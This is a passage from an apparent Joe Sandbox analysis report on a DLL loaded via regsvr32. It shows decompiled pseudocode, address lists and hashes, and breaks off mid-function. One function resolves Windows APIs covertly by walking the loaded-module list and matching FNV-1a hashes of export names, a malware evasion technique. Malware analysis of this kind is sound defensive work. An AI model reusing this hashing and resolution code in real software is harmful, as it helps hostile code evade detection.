						_t5 = _t325 - 1; // 0x1cb
						_t253 = _t5;
						_v12 = _t253;
						if(_t312 != 0) {
							__eflags = _t312 - _t253;
							if(_t312 > _t253) {
								goto L74;
							} else {
								_t191 = _t253;
								_t291 = _t253 - _t312;
								__eflags = _t253 - _t291;
								if(_t253 < _t291) {
									L19:
									_t291 = _t291 + 1;
									__eflags = _t291;
								} else {
									_t45 =  &_a8; // 0x6e46754f
									_t277 =  &(_t244[_t253 + 1]);
									_t341 =  *_t45 + _t312 * 4 + 4;
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t277;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t341 = _t341 - 4;
										_t277 = _t277 - 4;
										__eflags = _t191 - _t291;
										if(_t191 >= _t291) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t291;
								if(__eflags == 0) {
									goto L74;
								} else {
									_t50 =  &_a8; // 0x6e46754f
									_t192 =  *_t50;
									_t245 = _v56;
									_t326 =  *(_t192 + _t245 * 4);
									_t254 =  *(_t192 + _t245 * 4 - 4);
									asm("bsr eax, esi");
									_v52 = _t326;
									_v36 = _t254;
									if(__eflags == 0) {
										_t313 = 0x20;
									} else {
										_t313 = 0x1f - _t192;
									}
									_v16 = _t313;
									_v48 = 0x20 - _t313;
									__eflags = _t313;
									if(_t313 != 0) {
										_t274 = _t313;
										_v36 = _v36 << _t274;
										_v52 = _t326 << _t274 | _t254 >> _v48;
										__eflags = _t245 - 2;
										if(_t245 > 2) {
											_t65 =  &_a8; // 0x6e46754f
											_t70 =  &_v36;
											 *_t70 = _v36 |  *( *_t65 + _t245 * 4 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t327 = 0;
									_v32 = 0;
									_t292 = _t291 + 0xffffffff;
									__eflags = _t292;
									_v28 = _t292;
									if(_t292 >= 0) {
										_t197 = _t292 + _t245;
										_t247 = _a4;
										_v60 = _t197;
										_v64 = _t247 + 4 + _t292 * 4;
										_t260 = _t247 - 4 + _t197 * 4;
										_v80 = _t260;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t260[2];
											}
											_t296 = _t260[1];
											_t261 =  *_t260;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t261;
											__eflags = _t313;
											if(_t313 != 0) {
												_t303 = _v8;
												_t319 = _t261 >> _v48;
												_t94 =  &_v16; // 0x6e46754f
												_t221 = E6E46ABF0(_t296,  *_t94, _t303);
												_t95 =  &_v16; // 0x6e46754f
												_t261 =  *_t95;
												_t198 = _t303;
												_t296 = _t319 | _t221;
												_t327 = _v24 << _t261;
												__eflags = _v60 - 3;
												_v8 = _t303;
												_v24 = _t327;
												if(_v60 >= 3) {
													_t261 = _v48;
													_t327 = _t327 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t261;
													__eflags = _t327;
													_t198 = _v8;
													_v24 = _t327;
												}
											}
											_push(_t247);
											_t199 = E6E46A9C0(_t296, _t198, _v52, 0);
											_v40 = _t247;
											_t249 = _t199;
											_t328 = _t327 ^ _t327;
											_t200 = _t296;
											_v8 = _t249;
											_v20 = _t200;
											_t314 = _t261;
											_v72 = _t249;
											_v68 = _t200;
											_v40 = _t328;
											__eflags = _t200;
											if(_t200 != 0) {
												L37:
												_t250 = _t249 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E6E45A5E0(_t250, _t200, _v52, 0);
												asm("adc esi, edx");
												_t249 = _t250 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t328;
												_v8 = _t249;
												_v72 = _t249;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t249 - 0xffffffff;
												if(_t249 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t328;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L41;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L41:
															_v8 = _v24;
															_t219 = E6E45A5E0(_v36, 0, _t249, _t200);
															__eflags = _t296 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L44:
																_t200 = _v20;
																_t249 = _t249 + 0xffffffff;
																_v72 = _t249;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v52;
																__eflags = _t314;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L44;
																}
															}
															L48:
															_v8 = _t249;
															goto L49;
														}
														_t200 = _v20;
														goto L48;
													}
												}
											}
											L49:
											__eflags = _t200;
											if(_t200 != 0) {
												L51:
												_t262 = _v56;
												_t315 = 0;
												_t329 = 0;
												__eflags = _t262;
												if(_t262 != 0) {
													_t133 =  &_a8; // 0x6e46754f
													_t252 = _v64;
													_t210 =  *_t133 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t262;
													do {
														_v12 =  *_t210;
														_t216 =  *_t252;
														_t268 = _t315 + _v72 * _v12;
														asm("adc esi, edx");
														_t315 = _t329;
														_t329 = 0;
														__eflags = _t216 - _t268;
														if(_t216 < _t268) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t252 = _t216 - _t268;
														_t252 = _t252 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t249 = _v8;
													_t262 = _v56;
												}
												__eflags = 0 - _t329;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L60:
														__eflags = _t262;
														if(_t262 != 0) {
															_t159 =  &_a8; // 0x6e46754f
															_t251 = 0;
															_t299 = _v64;
															_t334 =  *_t159 + 4;
															__eflags = _t334;
															_t316 = _t262;
															do {
																_t264 =  *_t299;
																_t334 = _t334 + 4;
																_t299 = _t299 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t299 - 4)) = _t264 +  *((intOrPtr*)(_t334 - 4)) + _t251;
																asm("adc eax, 0x0");
																_t251 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t249 = _v8;
														}
														_t249 = _t249 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L60;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t249;
												if(_t249 != 0) {
													goto L51;
												}
											}
											_t327 = _v32;
											_t247 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t298 = _v28 - 1;
											_t174 =  &_v16; // 0x6e46754f
											_t313 =  *_t174;
											_t260 = _v80 - 4;
											_v32 = 0 + _t249;
											_t197 = _v60 - 1;
											_v28 = _t298;
											_v60 = _t197;
											_v80 = _t260;
											__eflags = _t298;
										} while (_t298 >= 0);
									}
									_t246 = _a4;
									_t256 = _v12 + 1;
									_t195 = _t256;
									__eflags = _t195 -  *_t246;
									if(_t195 <  *_t246) {
										_t295 =  &(( &(_t246[1]))[_t195]);
										do {
											 *_t295 = 0;
											_t295 =  &(_t295[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t246;
										} while (_t195 <  *_t246);
									}
									 *_t246 = _t256;
									__eflags = _t256;
									if(_t256 != 0) {
										while(1) {
											__eflags = _t246[_t256];
											if(_t246[_t256] != 0) {
												goto L73;
											}
											_t256 = _t256 + 0xffffffff;
											__eflags = _t256;
											 *_t246 = _t256;
											if(_t256 != 0) {
												continue;
											}
											goto L73;
										}
									}
									L73:
									return _v32;
								}
							}
						} else {
							_t304 =  *(_t289 + 4);
							_v12 = _t304;
							if(_t304 != 1) {
								__eflags = _t253;
								if(_t253 != 0) {
									_t323 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t253 - 0xffffffff;
									if(_t253 != 0xffffffff) {
										_t281 = _t253 + 1;
										__eflags = _t281;
										_t282 =  &(_t244[_t281]);
										_v32 = _t282;
										do {
											_t236 = E6E46A9C0( *_t282, _t323, _t304, 0);
											_v28 = _t244;
											_t244 = _t244;
											_v68 = _t304;
											_t323 = _t282;
											_v16 = 0 + _t236;
											_t304 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t282 = _v32 - 4;
											_v32 = _t282;
											_t325 = _t325 - 1;
											__eflags = _t325;
										} while (_t325 != 0);
										_t244 = _a4;
									}
									_v544 = 0;
									_t342 =  &(_t244[1]);
									 *_t244 = 0;
									E6E463CE9(_t342, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t342 = _t323;
									_t244[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t244 = 0xbadbae;
									return _v16;
								} else {
									_t324 =  &(_t244[1]);
									_v544 = _t253;
									 *_t244 = _t253;
									E6E463CE9(_t324, 0x1cc,  &_v540, _t253);
									_t239 = _t244[1];
									_t309 = _t239 % _v12;
									__eflags = 0 - _t309;
									 *_t324 = _t309;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t244 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t312;
								 *_t244 = _t312;
								E6E463CE9( &(_t244[1]), 0x1cc,  &_v540, _t312);
								return _t244[1];
							}
						}
					}
				}
			}

0x6e465e6c
0x6e465e71
0x6e465e75
0x6e4662ef
0x6e4662f1
0x6e4662f7
0x6e465e7b
0x6e465e7b
0x6e465e7b
0x6e465e7e
0x6e465e80
0x6e465e85
0x00000000
0x6e465e8b
0x6e465e8b
0x6e465e8e
0x6e465e8e
0x6e465e91
0x6e465e96
0x6e465fc7
0x6e465fc9
0x00000000
0x6e465fcf
0x6e465fd1
0x6e465fd3
0x6e465fd5
0x6e465fd7
0x6e465ffb
0x6e465ffb
0x6e465ffb
0x6e465fd9
0x6e465fd9
0x6e465fe0
0x6e465fe3
0x6e465fe3
0x6e465fe6
0x6e465fe8
0x6e465fea
0x00000000
0x00000000
0x6e465fec
0x6e465fed
0x6e465ff0
0x6e465ff3
0x6e465ff5
0x00000000
0x6e465ff7
0x00000000
0x6e465ff7
0x00000000
0x6e465ff5
0x6e465ff9
0x00000000
0x00000000
0x6e465ff9
0x6e465ffc
0x6e465ffc
0x6e465ffe
0x00000000
0x6e466004
0x6e466004
0x6e466004
0x6e466007
0x6e46600a
0x6e46600d
0x6e466011
0x6e466014
0x6e466017
0x6e46601a
0x6e466025
0x6e46601c
0x6e466021
0x6e466021
0x6e46602f
0x6e466034
0x6e466037
0x6e466039
0x6e466042
0x6e466044
0x6e46604b
0x6e46604e
0x6e466051
0x6e466053
0x6e46605f
0x6e46605f
0x6e46605f
0x6e46605f
0x6e466051
0x6e466062
0x6e466064
0x6e46606b
0x6e46606b
0x6e46606e
0x6e466071
0x6e466077
0x6e46607a
0x6e46607d
0x6e466086
0x6e46608c
0x6e46608f
0x6e466092
0x6e466092
0x6e466095
0x6e46609c
0x6e46609c
0x6e466097
0x6e466097
0x6e466097
0x6e46609e
0x6e4660a1
0x6e4660a3
0x6e4660a6
0x6e4660ad
0x6e4660b0
0x6e4660b3
0x6e4660b5
0x6e4660c0
0x6e4660c3
0x6e4660c5
0x6e4660c8
0x6e4660cd
0x6e4660cd
0x6e4660d4
0x6e4660d9
0x6e4660db
0x6e4660dd
0x6e4660e1
0x6e4660e4
0x6e4660e7
0x6e4660ef
0x6e4660f8
0x6e4660f8
0x6e4660fa
0x6e4660fd
0x6e4660fd
0x6e4660e7
0x6e466100
0x6e466108
0x6e46610d
0x6e466112
0x6e466114
0x6e466116
0x6e466118
0x6e46611b
0x6e46611e
0x6e466120
0x6e466123
0x6e466126
0x6e466129
0x6e46612b
0x6e466132
0x6e466137
0x6e46613a
0x6e466144
0x6e466146
0x6e466148
0x6e46614b
0x6e46614b
0x6e46614d
0x6e466150
0x6e466153
0x6e466156
0x6e466159
0x6e46612d
0x6e46612d
0x6e466130
0x00000000
0x00000000
0x6e466130
0x6e46615c
0x6e46615e
0x6e466160
0x00000000
0x6e466162
0x6e466162
0x6e466165
0x6e466167
0x6e466167
0x6e466175
0x6e466178
0x6e46617d
0x6e46617f
0x00000000
0x00000000
0x6e466181
0x6e466188
0x6e466188
0x6e46618b
0x6e46618e
0x6e466191
0x6e466194
0x6e466194
0x6e466197
0x6e46619a
0x6e46619e
0x6e4661a1
0x6e4661a3
0x6e4661a6
0x00000000
0x00000000
0x6e4661a8
0x6e4661a6
0x6e466183
0x6e466183
0x6e466186
0x00000000
0x00000000
0x00000000
0x00000000
0x6e466186
0x6e4661ad
0x6e4661ad
0x00000000
0x6e4661ad
0x6e4661aa
0x00000000
0x6e4661aa
0x6e466165
0x6e466160
0x6e4661b0
0x6e4661b0
0x6e4661b2
0x6e4661bc
0x6e4661bc
0x6e4661bf
0x6e4661c1
0x6e4661c3
0x6e4661c5
0x6e4661c7
0x6e4661ca
0x6e4661cd
0x6e4661cd
0x6e4661d0
0x6e4661d3
0x6e4661d6
0x6e4661d8
0x6e4661ed
0x6e4661ef
0x6e4661f1
0x6e4661f3
0x6e4661f5
0x6e4661f7
0x6e4661f9
0x6e4661fb
0x6e4661fe
0x6e4661fe
0x6e466202
0x6e466204
0x6e46620a
0x6e46620d
0x6e46620d
0x6e46620d
0x6e466211
0x6e466211
0x6e466216
0x6e466219
0x6e466219
0x6e46621e
0x6e466220
0x6e466222
0x6e466229
0x6e466229
0x6e46622b
0x6e46622d
0x6e466230
0x6e466232
0x6e466235
0x6e466235
0x6e466238
0x6e466240
0x6e466240
0x6e466242
0x6e466247
0x6e46624d
0x6e466251
0x6e466254
0x6e466257
0x6e466259
0x6e466259
0x6e466259
0x6e46625e
0x6e46625e
0x6e466261
0x6e466264
0x6e466224
0x6e466224
0x6e466227
0x00000000
0x00000000
0x6e466227
0x6e466222
0x6e46626b
0x6e46626b
0x6e46626c
0x6e4661b4
0x6e4661b4
0x6e4661b6
0x00000000
0x00000000
0x6e4661b6
0x6e46626f
0x6e46627c
0x6e46627f
0x6e466282
0x6e466286
0x6e466287
0x6e466287
0x6e46628a
0x6e46628d
0x6e466293
0x6e466294
0x6e466297
0x6e46629a
0x6e46629d
0x6e46629d
0x6e466092
0x6e4662a8
0x6e4662ab
0x6e4662ac
0x6e4662ae
0x6e4662b0
0x6e4662b5
0x6e4662c0
0x6e4662c0
0x6e4662c6
0x6e4662c9
0x6e4662ca
0x6e4662ca
0x6e4662c0
0x6e4662ce
0x6e4662d0
0x6e4662d2
0x6e4662d4
0x6e4662d4
0x6e4662d8
0x00000000
0x00000000
0x6e4662da
0x6e4662da
0x6e4662dd
0x6e4662df
0x00000000
0x00000000
0x00000000
0x6e4662df
0x6e4662d4
0x6e4662e1
0x6e4662ec
0x6e4662ec
0x6e465ffe
0x6e465e9c
0x6e465e9c
0x6e465e9f
0x6e465ea5
0x6e465ed6
0x6e465ed8
0x6e465f1a
0x6e465f1c
0x6e465f23
0x6e465f2a
0x6e465f2d
0x6e465f30
0x6e465f32
0x6e465f32
0x6e465f33
0x6e465f36
0x6e465f40
0x6e465f4a
0x6e465f4f
0x6e465f52
0x6e465f54
0x6e465f57
0x6e465f60
0x6e465f63
0x6e465f66
0x6e465f69
0x6e465f6f
0x6e465f72
0x6e465f75
0x6e465f75
0x6e465f75
0x6e465f7a
0x6e465f7a
0x6e465f85
0x6e465f90
0x6e465f93
0x6e465f9f
0x6e465fa4
0x6e465faf
0x6e465fb1
0x6e465fb3
0x6e465fb9
0x6e465fbe
0x6e465fc0
0x6e465fc6
0x6e465eda
0x6e465ee5
0x6e465ee8
0x6e465ef4
0x6e465ef6
0x6e465efd
0x6e465eff
0x6e465f07
0x6e465f09
0x6e465f0b
0x6e465f10
0x6e465f13
0x6e465f19
0x6e465f19
0x6e465ea7
0x6e465eb5
0x6e465ec1
0x6e465ec3
0x6e465ed5
0x6e465ed5
0x6e465ea5
0x6e465e96
0x6e465e85

Strings

OuFn, xrefs: 6E466287, 6E4660C5, 6E4660CD
OuFn, xrefs: 6E465E7B, 6E466004, 6E46622D, 6E4661C7, 6E466053, 6E465FD9

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: OuFn$OuFn
API String ID: 0-3214059053
Opcode ID: 1d17998904595eead4dd939975fd52231ea98c3d130c3ba6d0c5997af81a9db1
Instruction ID: 6cd3d1817d0c60aaea302941d30bfa6849addbe2e08af7c232381cea5bf27a87
Opcode Fuzzy Hash: 1d17998904595eead4dd939975fd52231ea98c3d130c3ba6d0c5997af81a9db1
Instruction Fuzzy Hash: 61F14D71E102199FDF14CFA8C890ADEBBB1FF88314F1582AED819AB345D731A901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E418300 Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1071
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E6E418300(char _a4) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				void* _v13;
				signed int _v14;
				char _v15;
				signed char _v16;
				void* _v17;
				signed int _v18;
				signed char _v19;
				void* _v20;
				signed int _v21;
				signed char _v22;
				void* _v23;
				signed int _v24;
				signed char _v25;
				void* _v26;
				signed int _v27;
				signed char _v28;
				void* _v29;
				signed int _v30;
				signed char _v31;
				void* _v32;
				signed int _v33;
				char _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				char _v76;
				void* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr* _v200;
				intOrPtr _v204;
				intOrPtr* _v208;
				signed int _v212;
				intOrPtr* _v216;
				intOrPtr _v220;
				intOrPtr* _v224;
				signed int _v228;
				intOrPtr* _v232;
				intOrPtr _v236;
				intOrPtr* _v240;
				signed int _v244;
				intOrPtr* _v248;
				char _v252;
				intOrPtr* _v256;
				intOrPtr* _v260;
				char _v264;
				intOrPtr* _v268;
				signed int _v272;
				intOrPtr* _v276;
				char _v280;
				intOrPtr _v284;
				signed int _v288;
				intOrPtr* _v292;
				signed int _v296;
				intOrPtr* _v300;
				intOrPtr _v304;
				intOrPtr* _v308;
				signed int _v312;
				signed char _v316;
				intOrPtr _v320;
				signed char _v324;
				signed char _v328;
				signed char _v332;
				signed char _v336;
				signed char _v340;
				signed char _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr* _v360;
				intOrPtr _v364;
				char _v368;
				intOrPtr* _v372;
				char _v376;
				intOrPtr* _v380;
				intOrPtr* _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr* _v412;
				intOrPtr _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr* _v444;
				intOrPtr _v448;
				char _v452;
				intOrPtr* _v456;
				char _v460;
				intOrPtr* _v464;
				char _v468;
				intOrPtr* _v472;
				char _v476;
				intOrPtr* _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr* _v516;
				intOrPtr _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr* _v548;
				intOrPtr _v552;
				char _v556;
				intOrPtr* _v560;
				char _v564;
				intOrPtr* _v568;
				char _v572;
				intOrPtr* _v576;
				char _v580;
				intOrPtr* _v584;
				intOrPtr* _v588;
				intOrPtr* _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr* _v628;
				intOrPtr _v632;
				signed int _v636;
				intOrPtr* _v640;
				signed int _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr* _v660;
				intOrPtr _v664;
				intOrPtr* _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr* _v684;
				intOrPtr _v688;
				signed int _v692;
				intOrPtr* _v696;
				signed int _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr* _v716;
				intOrPtr _v720;
				char _v724;
				intOrPtr* _v728;
				char _v732;
				intOrPtr* _v736;
				char _v740;
				intOrPtr* _v744;
				intOrPtr* _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr* _v776;
				intOrPtr _v780;
				signed int _v784;
				intOrPtr* _v788;
				signed int _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr* _v808;
				intOrPtr _v812;
				char _v816;
				intOrPtr* _v820;
				char _v824;
				intOrPtr* _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr* _v848;
				intOrPtr _v852;
				signed int _v856;
				intOrPtr* _v860;
				signed int _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr* _v880;
				intOrPtr _v884;
				intOrPtr* _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr* _v960;
				intOrPtr _v964;
				signed int _v968;
				intOrPtr* _v972;
				signed int _v976;
				intOrPtr _v980;
				char _v984;
				char _v988;
				char _v992;
				char _v996;
				char _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				char _v4084;
				intOrPtr _t995;
				intOrPtr _t1175;
				intOrPtr _t1250;
				intOrPtr _t1304;
				intOrPtr _t1319;
				intOrPtr _t1336;
				intOrPtr _t1370;

				_v80 = 0;
				_v112 = 0;
				_v996 = 0;
				_v40 = 0;
				_v44 = 0;
				_v76 = 0;
				_v1000 = 0;
				_v368 = 0;
				_v376 = 1;
				_v304 = _v1004;
				_v952 =  *[fs:0x30];
				_v956 =  *((intOrPtr*)(_v952 + 0xc));
				_v960 =  *((intOrPtr*)(_v956 + 0xc));
				_v300 = _v960;
				do {
					_v84 =  *((intOrPtr*)(_v300 + 0x18));
					_v148 = _v84;
					_v964 = _v84 +  *((intOrPtr*)(_v84 + 0x3c));
					_t1304 = _v964;
					_v900 =  *((intOrPtr*)(_t1304 + 0x78));
					_v896 =  *((intOrPtr*)(_t1304 + 0x7c));
					_v144 = _v84 + _v900;
					_v140 = _v896;
					if(_v144 == _v148) {
						_v328 = 0;
					} else {
						_v328 = 1;
					}
					_v12 = _v328;
					if((_v12 & 0x000000ff) != 0) {
						_v48 =  *((intOrPtr*)(_v144 + 0x18));
						while(1) {
							_v968 = _v48;
							_v48 = _v48 - 1;
							if(_v968 == 0) {
								goto L14;
							}
							_v972 = _v148 +  *((intOrPtr*)(_v148 +  *((intOrPtr*)(_v144 + 0x20)) + _v48 * 4));
							_v292 = _v972;
							_v296 = 0x811c9dc5;
							while(1) {
								_v13 =  *_v292;
								_v292 = _v292 + 1;
								_v5 = _v13;
								if(_v5 == 0) {
									break;
								}
								L10:
								_v296 = (_v5 ^ _v296) * 0x1000193;
							}
							_v976 = _v296;
							if(_v976 != 0x5258823f) {
								continue;
							} else {
								_v352 = _v148 +  *((intOrPtr*)(_v144 + 0x1c));
								_v348 = _v148 +  *((intOrPtr*)(_v144 + 0x24));
								_v356 = _v148 +  *((intOrPtr*)(_v352 + ( *(_v348 + _v48 * 2) & 0x0000ffff) * 4));
								_v304 = _v356;
								L16:
								_v372 =  &_v368;
								_v388 =  *_v372;
								_v380 =  &_v376;
								_v392 =  *_v380;
								_v384 =  &_a4;
								_v396 =  *_v384;
								_v400 = _v304(_v396, _v392, _v388);
								if(_v400 != 0) {
									_v452 = 0;
									_v15 = 0;
									_v460 = 0;
									_v468 = 0;
									_v476 = 0;
									_v484 = E6E4121F0( &_v15);
									_v204 = _v1008;
									_v404 =  *[fs:0x30];
									_v408 =  *((intOrPtr*)(_v404 + 0xc));
									_v412 =  *((intOrPtr*)(_v408 + 0xc));
									_v200 = _v412;
									do {
										_v88 =  *((intOrPtr*)(_v200 + 0x18));
										_v136 = _v88;
										_v416 = _v88 +  *((intOrPtr*)(_v88 + 0x3c));
										_t1319 = _v416;
										_v908 =  *((intOrPtr*)(_t1319 + 0x78));
										_v904 =  *((intOrPtr*)(_t1319 + 0x7c));
										_v132 = _v88 + _v908;
										_v128 = _v904;
										if(_v132 == _v136) {
											_v332 = 0;
										} else {
											_v332 = 1;
										}
										_v16 = _v332;
										if((_v16 & 0x000000ff) != 0) {
											_v52 =  *((intOrPtr*)(_v132 + 0x18));
											while(1) {
												_v420 = _v52;
												_v52 = _v52 - 1;
												if(_v420 == 0) {
													goto L32;
												}
												_v424 = _v136 +  *((intOrPtr*)(_v136 +  *((intOrPtr*)(_v132 + 0x20)) + _v52 * 4));
												_v308 = _v424;
												_v312 = 0x811c9dc5;
												while(1) {
													_v17 =  *_v308;
													_v308 = _v308 + 1;
													_v6 = _v17;
													if(_v6 == 0) {
														break;
													}
													L28:
													_v312 = (_v6 ^ _v312) * 0x1000193;
												}
												_v428 = _v312;
												if(_v428 != 0xe23b96e7) {
													continue;
												} else {
													_v436 = _v136 +  *((intOrPtr*)(_v132 + 0x1c));
													_v432 = _v136 +  *((intOrPtr*)(_v132 + 0x24));
													_v440 = _v136 +  *((intOrPtr*)(_v436 + ( *(_v432 + _v52 * 2) & 0x0000ffff) * 4));
													_v204 = _v440;
													L34:
													_v456 =  &_v452;
													_v488 =  *_v456;
													_v464 =  &_v460;
													_v492 =  *_v464;
													_v472 =  &_v468;
													_v496 =  *_v472;
													_v480 =  &_v476;
													_v500 =  *_v480;
													_v320 = _v484;
													E6E41F8F0(_v320);
													_v504 = _v320;
													_v80 = _v204(_v504, _v500, _v496, _v492, _v488);
													if(_v80 != 0) {
														_v556 = 0;
														_v564 = 0x84000000;
														_v572 = 0;
														_v580 = 0;
														_v220 = _v1012;
														_v508 =  *[fs:0x30];
														_v512 =  *((intOrPtr*)(_v508 + 0xc));
														_v516 =  *((intOrPtr*)(_v512 + 0xc));
														_v216 = _v516;
														do {
															_v92 =  *((intOrPtr*)(_v216 + 0x18));
															_v160 = _v92;
															_v520 = _v92 +  *((intOrPtr*)(_v92 + 0x3c));
															_t1336 = _v520;
															_v916 =  *((intOrPtr*)(_t1336 + 0x78));
															_v912 =  *((intOrPtr*)(_t1336 + 0x7c));
															_v156 = _v92 + _v916;
															_v152 = _v912;
															if(_v156 == _v160) {
																_v344 = 0;
															} else {
																_v344 = 1;
															}
															_v19 = _v344;
															if((_v19 & 0x000000ff) != 0) {
																_v56 =  *((intOrPtr*)(_v156 + 0x18));
																while(1) {
																	_v524 = _v56;
																	_v56 = _v56 - 1;
																	if(_v524 == 0) {
																		goto L50;
																	}
																	_v528 = _v160 +  *((intOrPtr*)(_v160 +  *((intOrPtr*)(_v156 + 0x20)) + _v56 * 4));
																	_v208 = _v528;
																	_v212 = 0x811c9dc5;
																	while(1) {
																		_v20 =  *_v208;
																		_v208 = _v208 + 1;
																		_v7 = _v20;
																		if(_v7 == 0) {
																			break;
																		}
																		L46:
																		_v212 = (_v7 ^ _v212) * 0x1000193;
																	}
																	_v532 = _v212;
																	if(_v532 != 0xf4cf8bbc) {
																		continue;
																	} else {
																		_v540 = _v160 +  *((intOrPtr*)(_v156 + 0x1c));
